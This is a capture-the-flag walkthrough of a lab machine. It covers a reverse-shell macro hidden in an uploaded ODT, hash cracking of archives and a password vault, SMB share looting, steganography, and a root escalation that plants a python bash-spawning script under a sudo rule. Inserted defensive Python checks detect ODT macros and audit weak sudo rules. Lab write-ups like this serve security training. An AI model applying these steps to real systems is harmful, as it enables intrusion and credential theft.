TheHackersLabs - El Candidato: detailed machine walkthrough (WP)
城南花已开 Lv5

Information gathering

Service discovery

Quite a few ports are open.

```
sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.132 08:00:27:71:a0:e7 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fd:82:05 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.090 seconds (122.49 hosts/sec). 4 responded
❯ ip=192.168.60.132
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.132:22
Open 192.168.60.132:25
Open 192.168.60.132:80
Open 192.168.60.132:110
Open 192.168.60.132:139
Open 192.168.60.132:143
Open 192.168.60.132:445
Open 192.168.60.132:993
Open 192.168.60.132:995
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 20:40 CST
Initiating ARP Ping Scan at 20:40
Scanning 192.168.60.132 [1 port]
Completed ARP Ping Scan at 20:40, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:40
Completed Parallel DNS resolution of 1 host. at 20:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:40
Scanning 192.168.60.132 [9 ports]
Discovered open port 143/tcp on 192.168.60.132
Discovered open port 22/tcp on 192.168.60.132
Discovered open port 995/tcp on 192.168.60.132
Discovered open port 139/tcp on 192.168.60.132
Discovered open port 110/tcp on 192.168.60.132
Discovered open port 25/tcp on 192.168.60.132
Discovered open port 80/tcp on 192.168.60.132
Discovered open port 993/tcp on 192.168.60.132
Discovered open port 445/tcp on 192.168.60.132
Completed SYN Stealth Scan at 20:40, 0.04s elapsed (9 total ports)
Nmap scan report for 192.168.60.132
Host is up, received arp-response (0.0016s latency).
Scanned at 2025-01-02 20:40:45 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
25/tcp open smtp syn-ack ttl 64
80/tcp open http syn-ack ttl 64
110/tcp open pop3 syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
143/tcp open imap syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
993/tcp open imaps syn-ack ttl 64
995/tcp open pop3s syn-ack ttl 64
MAC Address: 08:00:27:71:A0:E7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Raw packets sent: 10 (424B) | Rcvd: 10 (424B)
```

Open the web page and look for a way in.


Directory scan

```
❯ gobuster dir -u http://192.168.60.132 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.132
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.60.132/images/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.60.132/uploads/]
/assets (Status: 301) [Size: 317] [--> http://192.168.60.132/assets/]
/config (Status: 301) [Size: 317] [--> http://192.168.60.132/config/]
/views (Status: 301) [Size: 316] [--> http://192.168.60.132/views/]
/roundcube (Status: 301) [Size: 320] [--> http://192.168.60.132/roundcube/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
==============================================================
```

One of the pages needs a domain name to load, so I added it to the hosts file.

Visiting http://gyhabogados.thl/work-with-us.php shows a contact-us style form.


Submitting the form requires an attachment, and only pdf, doc and odt files are accepted.

So the only option is to put a reverse shell inside one of these allowed file types.

odt file upload

Looking at other people's writeups, the way in is an odt file carrying a macro script that runs automatically when the file is opened.

Create a new macro.


Write the reverse shell into it.


Then edit the Events so that the rev macro runs when the document is opened.


Try uploading the file: the phone number has to be 8 digits, fix that and the upload goes through.
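The upload form above only checks the file extension (pdf/doc/odt), which is exactly why a macro-bearing odt gets through. The following Python check is an added example and not part of this writeup: it shows what a server-side scan of an uploaded ODT could look like. An ODT is a zip container; macro code is stored under Basic/ (or Scripts/ for other languages) and the auto-run binding appears as a script:event-listener element inside office:scripts in content.xml, with dom:load firing when the document is opened. The sample document is constructed here (it is not the file uploaded in the writeup), and the function names and the reject-anything-with-macros policy are my own assumptions.

```python
"""Flag uploaded ODT files that carry macro code or document event bindings.

Added example, not from the writeup. Regex over the XML is used as a triage
heuristic; a production filter would parse the ODF XML with namespaces.
"""
import io
import re
import zipfile

ODT_MIME = "application/vnd.oasis.opendocument.text"
# ODF stores Basic modules under Basic/ and other script languages under Scripts/
MACRO_DIR_RE = re.compile(r"^(Basic|Scripts)/")
EVENT_RE = re.compile(r"<script:event-listener\b[^>]*>")
EVENT_NAME_RE = re.compile(r'script:event-name="([^"]+)"')
HREF_RE = re.compile(r'xlink:href="([^"]+)"')


def odt_macro_indicators(data):
    """Describe macro content found in the ODT bytes `data`."""
    result = {"is_odt": False, "macro_files": [], "event_listeners": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # not a zip container at all, so not an ODT
    names = zf.namelist()
    mimetype = zf.read("mimetype").decode("ascii", "replace") if "mimetype" in names else ""
    result["is_odt"] = mimetype.strip() == ODT_MIME
    result["macro_files"] = [n for n in names if MACRO_DIR_RE.match(n)]
    # event bindings (e.g. dom:load -> vnd.sun.star.script:...) live in content.xml or styles.xml
    for part in ("content.xml", "styles.xml"):
        if part not in names:
            continue
        xml = zf.read(part).decode("utf-8", "replace")
        for tag in EVENT_RE.findall(xml):
            name = EVENT_NAME_RE.search(tag)
            href = HREF_RE.search(tag)
            result["event_listeners"].append(
                (part, name.group(1) if name else "?", href.group(1) if href else "?")
            )
    return result


def should_reject(data):
    """Upload policy (assumed): refuse any ODT that contains macro code or event bindings."""
    ind = odt_macro_indicators(data)
    return bool(ind["macro_files"] or ind["event_listeners"])


def build_sample_odt(with_macro):
    """Constructed minimal ODT; with_macro adds an empty Basic module bound to dom:load."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # ODF requires 'mimetype' to be the first, uncompressed entry
        zf.writestr("mimetype", ODT_MIME, compress_type=zipfile.ZIP_STORED)
        scripts = ""
        if with_macro:
            zf.writestr("Basic/Standard/Module1.xml", "<script:module>Sub rev\nEnd Sub</script:module>")
            scripts = (
                "<office:scripts><office:event-listeners>"
                '<script:event-listener script:event-name="dom:load" script:language="ooo:script" '
                'xlink:href="vnd.sun.star.script:Standard.Module1.rev?language=Basic&amp;location=document"/>'
                "</office:event-listeners></office:scripts>"
            )
        zf.writestr(
            "content.xml",
            f'<?xml version="1.0"?><office:document-content>{scripts}<office:body/></office:document-content>',
        )
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        doc = build_sample_odt(flag)
        print("macro" if flag else "clean", odt_macro_indicators(doc), "reject:", should_reject(doc))
```

The clean sample passes and the macro sample is rejected because both the Basic/ module and the dom:load listener are present; either indicator alone is enough to refuse the upload, since a binding without code or code without a binding is still not something a job-application form needs.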

Getting user

The shell did come back, but it dropped as soon as it connected.

I tried a different port and tweaked the script.

```
❯ pwncat-cs -lp 4444
[22:17:55] Welcome to pwncat 🐈! __main__.py:164
[22:18:02] received connection from 192.168.60.132:38282 bind.py:84
[22:18:02] connection failed: channel unexpectedly closed
❯ pwncat-cs -lp 1234
[23:26:54] Welcome to pwncat 🐈! __main__.py:164
[23:28:52] received connection from 192.168.60.132:44638 bind.py:84
[23:28:52] 0.0.0.0:1234: normalizing shell path manager.py:957
[23:28:53] 192.168.60.132:44638: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) bob@TheHackersLabs-Gyhabogados:/home/bob$ ls
1 credentials.7z Desktop Documents Downloads mail Maildir Music Pictures Public scripts Templates Videos
```

Cracking the archive

There is an archive in the home directory; download it and crack it locally.

```
(local) pwncat$ download /home/bob/credentials.7z thl
/home/bob/credentials.7z ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 186/186 bytes • ? • 0:00:00
[23:33:54] downloaded 186.00B in 0.16 seconds
❯ 7z2john credentials.7z>hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 6 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 26 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:02 78.62% 1/3 (ETA: 23:38:00) 0g/s 51.45p/s 51.45c/s 51.45C/s Credentials7z46..Credentials.7z7z50
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
barcelona (credentials.7z)
1g 0:00:03:02 DONE 2/3 (2025-01-02 23:38) 0.005480g/s 58.62p/s 58.62c/s 58.62C/s samsung..benfica
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The password is barcelona; extracting the archive yields another account's credentials.

```
❯ 7z x credentials.7z

7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 186 bytes (1 KiB)

Extracting archive: credentials.7z
--
Path = credentials.7z
Type = 7z
Physical Size = 186
Headers Size = 154
Method = LZMA2:12 7zAES
Solid = -
Blocks = 1


Enter password (will not be echoed):
Everything is Ok

Size: 22
Compressed: 186
cat credentials.txt
bob:a7gyqqp6bt2!uv@2u
```

This user cannot log in over ssh.

I remembered that the directory scan earlier turned up roundcube, which needs a user login.

Let's try logging in there.

It works, and in the sent mail folder I found another user, sam.


This user can connect over ssh.

```
❯ ssh sam@192.168.60.132
The authenticity of host '192.168.60.132 (192.168.60.132)' can't be established.
ED25519 key fingerprint is SHA256:/1wFoojXYBApFG/OVnUYsxumIf2wGVEEbaeuhBYdtQI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.132' (ED25519) to the list of known hosts.
sam@192.168.60.132's password:
Linux TheHackersLabs-Gyhabogados 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 8 18:26:08 2024 from 192.168.1.18
sam@TheHackersLabs-Gyhabogados:~$ ls -al
total 44
drwx------ 6 sam abogados 4096 Dec 8 15:44 .
drwxr-xr-x 6 root root 4096 Dec 7 18:06 ..
lrwxrwxrwx 1 root root 9 Dec 8 15:44 .bash_history -> /dev/null
-rw-r--r-- 1 sam sam 220 Mar 29 2024 .bash_logout
-rw-r--r-- 1 sam sam 3526 Mar 29 2024 .bashrc
drwx------ 4 sam sam 4096 Dec 7 17:30 .cache
drwxr-xr-x 3 sam sam 4096 Dec 7 17:30 .config
-rw-r--r-- 1 sam sam 5290 Jul 12 2023 .face
lrwxrwxrwx 1 sam sam 5 Jul 12 2023 .face.icon -> .face
drwx------ 4 sam sam 4096 Dec 7 17:30 .local
drwx------ 7 sam sam 4096 Dec 8 15:02 Maildir
-rw-r--r-- 1 sam sam 807 Mar 29 2024 .profile
sam@TheHackersLabs-Gyhabogados:~$ cd Maildir/
sam@TheHackersLabs-Gyhabogados:~/Maildir$ ls
cur dovecot.index.log dovecot.mailbox.log dovecot-uidvalidity new tmp
dovecot.index.cache dovecot.list.index.log dovecot-uidlist dovecot-uidvalidity.67535838 subscriptions
```

SMB service

Another round of information gathering.

Keep enumerating and you find that the sam user can connect to the SMB service,

and that the RESPALDOS_IT share is readable while IT_TOOLS is not accessible.

```
❯ smbclient -N -L  //192.168.60.132 -U "sam" --password='Welcome2024!'

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
CONFIDENCIALES Disk Documentos Confidenciales de Clientes
IT_TOOLS Disk IT Tools
RESPALDOS_IT Disk Respaldos IT
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
sam Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.60.132 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -N //192.168.60.132/RESPALDOS_IT -U "sam" --password='Welcome2024!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Dec 9 01:56:48 2024
.. D 0 Mon Dec 9 01:55:59 2024
credenciales.psafe3 N 520 Mon Dec 9 01:49:33 2024
IMPORTANTE.txt N 582 Sun Dec 8 09:41:58 2024

19480400 blocks of size 1024. 11336424 blocks available
smb: \> get credenciales.psafe3
getting file \credenciales.psafe3 of size 520 as credenciales.psafe3 (24.2 KiloBytes/sec) (average 24.2 KiloBytes/sec)
smb: \> get IMPORTANTE.txt
getting file \IMPORTANTE.txt of size 582 as IMPORTANTE.txt (51.7 KiloBytes/sec) (average 33.6 KiloBytes/sec)
smb: \>
```

Both files are retrieved locally.

IMPORTANTE.txt contains a hint.


Looks like we need to generate a password wordlist.

That gives the password for credenciales.psafe3: ChevyImpala1995.

```
for i in {1900..2100};do echo  ChevyImpala$i>>pass;done
❯ pwsafe2john credenciales.psafe3 >hash
❯ john hash --wordlist=pass
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ChevyImpala1995 (credencial)
1g 0:00:00:00 DONE (2025-01-03 00:02) 100.0g/s 20100p/s 20100c/s 20100C/s ChevyImpala1900..ChevyImpala2100
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Opening the psafe3 file requires installing a password manager.

```
❯ sudo apt-get -y install passwordsafe
```


This yields another user, dean, with the password MasterOfPuppets1986.

```
❯ ssh dean@192.168.60.132
dean@192.168.60.132's password:
Linux TheHackersLabs-Gyhabogados 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 8 19:12:27 2024 from 192.168.1.18
dean@TheHackersLabs-Gyhabogados:~$ ls
Maildir user.txt
dean@TheHackersLabs-Gyhabogados:~$ cat user.txt
930b5a4b9098abfdaa67f93a937593bf
```

Finally got the user flag.

It's late, I'll continue tomorrow 🥱


Root privilege escalation

There is still one user in the home directory we have not used yet.

```
dean@TheHackersLabs-Gyhabogados:/home$ ls -al
total 24
drwxr-xr-x 6 root root 4096 Dec 7 18:06 .
drwxr-xr-x 20 root root 4096 Dec 6 14:25 ..
drwx------ 19 bob bob 4096 Jan 2 10:16 bob
drwx------ 8 dean abogados 4096 Dec 8 16:02 dean
drwx------ 8 john john 4096 Dec 8 19:09 john
drwx------ 6 sam abogados 4096 Dec 8 15:44 sam
```

Using the ppk file

Next, logging into the SMB service as dean reveals a private key in ppk format.

```
❯ smbclient -N  //192.168.60.132/IT_TOOLS -U "dean" --password='MasterOfPuppets1986'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Dec 9 01:12:50 2024
.. D 0 Mon Dec 9 01:55:59 2024
private_key.ppk N 1458 Sun Dec 8 08:20:47 2024

19480400 blocks of size 1024. 11328960 blocks available
smb: \> get private_key.ppk
getting file \private_key.ppk of size 1458 as private_key.ppk (355.9 KiloBytes/sec) (average 356.0 KiloBytes/sec)
smb: \> qui
```

.ppk is the extension of a PuTTY Private Key file, the private key format that PuTTY generates and uses. PuTTY is an SSH and Telnet client widely used on Windows, and .ppk files exist specifically to store PuTTY private keys.

So we need to install putty-tools and convert the key into an OpenSSH private key.

With that we log in as john.

```
sudo apt install putty-tools
❯ puttygen private_key.ppk -O private-openssh -o private_key.pem
chmod 600 private_key.pem
❯ ssh john@192.168.60.132 -i private_key.pem
Linux TheHackersLabs-Gyhabogados 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 8 19:22:50 2024 from 192.168.1.18
john@TheHackersLabs-Gyhabogados:~$
```

There is nothing to break through from this user, though.

Logging into the mail system as dean shows that bob sent dean an email.

Image steganography

The email contains a picture of a car.


I guessed it was image steganography again.

Sure enough, it gives john's password.

```
❯ stegcracker impala_67.jpg
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2025 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

No wordlist was specified, using default rockyou.txt wordlist.
Counting lines in wordlist..
Attacking file 'impala_67.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: ironmaiden
Tried 4598 passwords
Your file has been written to: impala_67.jpg.out
ironmaiden
cat impala_67.jpg.out
john: TI!Powerful2024
```

Sudo permissions

john has sudo rights to run a backup script.

```
john@TheHackersLabs-Gyhabogados:~$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on TheHackersLabs-Gyhabogados:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User john may run the following commands on TheHackersLabs-Gyhabogados:
(ALL) PASSWD: /usr/bin/python3 /home/john/tools/backup.py
```

But the script does not exist under tools, and the directory is john's own, so creating the file ourselves and escalating through python is all it takes.

```
john@TheHackersLabs-Gyhabogados:~/tools$ vim backup.py
import os
os.system('bash -c "/bin/bash"')
john@TheHackersLabs-Gyhabogados:~/tools$ sudo /usr/bin/python3 /home/john/tools/backup.py
root@TheHackersLabs-Gyhabogados:/home/john/tools# id
uid=0(root) gid=0(root) groups=0(root)
root@TheHackersLabs-Gyhabogados:/home/john/tools# cd /root
root@TheHackersLabs-Gyhabogados:~# ls
Maildir notes.txt vboxpostinstall.sh
root@TheHackersLabs-Gyhabogados:~# cat notes.txt
███████ ██ ██████ █████ ███ ██ ██████ ██ ██████ █████ ████████ ██████
██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
█████ ██ ██ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ███████ ██████ ██ ██ ██ ████ ██████ ██ ██████ ██ ██ ██ ██████

¡Felicidades, hacker!

Has logrado rootear la máquina.

Recuerda, la ciberseguridad es un campo en constante evolución. Los desafíos son solo una pieza del rompecabezas;
sigue aprendiendo, explorando y compartiendo tu conocimiento.

Si te gustó este CTF, ¡cuéntaselo a otros! Y si encontraste errores o tienes sugerencias, no dudes en hacérmelo saber.

Flag: 63baa2b1cd7ac490cf34e7c6a317067b

"La verdadera fuerza de voluntad está en fallar una y otra vez, y al final tener éxito"
--- David Goggins
```
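The root step works because the sudo rule points at a script that does not exist inside a directory john owns, so the rule effectively hands john a root shell. The Python audit below is an added example and not part of this writeup: it parses `sudo -l` style output, resolves which files a rule actually executes (the binary, plus the script argument when the binary is an interpreter such as python3), and reports targets that are missing, not root-owned, or writable. The demo() scenario rebuilds the writeup's situation in a temporary directory constructed here rather than touching /home/john/tools; the function names and the interpreter list are my own assumptions.

```python
"""Audit sudo rules whose executed script is missing or writable by the caller.

Added example, not from the writeup. Run as the sudo user in question so that
os.access() reflects that user's rights.
"""
import os
import re
import shlex
import stat
import tempfile

# Interpreters that execute whatever path they are handed as an argument.
INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "ruby", "node"}

# Matches lines such as: (ALL) PASSWD: /usr/bin/python3 /home/john/tools/backup.py
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S.*)$")


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from `sudo -l` output; other lines are ignored."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas").strip(), m.group("tags").strip(), m.group("cmd").strip()))
    return rules


def script_targets(cmd):
    """Absolute paths the rule will execute: the binary plus, for interpreters, script arguments."""
    argv = shlex.split(cmd)
    targets = [argv[0]]
    if os.path.basename(argv[0]) in INTERPRETERS:
        targets += [a for a in argv[1:] if a.startswith("/")]
    return targets


def path_problems(path):
    """Reasons why a non-root user could control what `path` does when run as root."""
    reasons = []
    if not os.path.exists(path):
        reasons.append("missing")
        # climb to the nearest existing directory; if we can write there, we can create the file
        parent = os.path.dirname(path)
        while parent and not os.path.isdir(parent):
            parent = os.path.dirname(parent)
        if parent and os.access(parent, os.W_OK):
            reasons.append("parent-writable")
        return reasons
    st = os.stat(path)
    if st.st_uid != 0:
        reasons.append("not-root-owned")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group-or-world-writable")
    if os.access(path, os.W_OK):
        reasons.append("writable-by-current-user")
    return reasons


def audit(text):
    """Map every executed path in the rules to its problem list (empty list means fine)."""
    report = {}
    for _runas, _tags, cmd in parse_sudo_l(text):
        for target in script_targets(cmd):
            report[target] = path_problems(target)
    return report


def demo():
    """Constructed scenario mirroring the writeup: tools/ exists and is ours, backup.py does not."""
    base = tempfile.mkdtemp()
    tools = os.path.join(base, "tools")
    os.mkdir(tools)
    target = os.path.join(tools, "backup.py")
    rule = f"(ALL) PASSWD: /usr/bin/python3 {target}"
    before = audit(rule)[target]  # script missing, directory writable: caller can plant it
    with open(target, "w") as fh:
        fh.write("print('backup')\n")
    os.chmod(target, 0o666)
    after = audit(rule)[target]  # script present but editable: same outcome
    return {"target": target, "before": before, "after": after}


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, reasons)
```

The fix on the machine side is the mirror image of the findings: the script must exist, be owned by root, sit in a root-owned directory, and not be writable by the user the rule is granted to; anything less turns a narrow backup rule into `(ALL) ALL`.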

This box was quite fun, with each step chaining into the next 😀
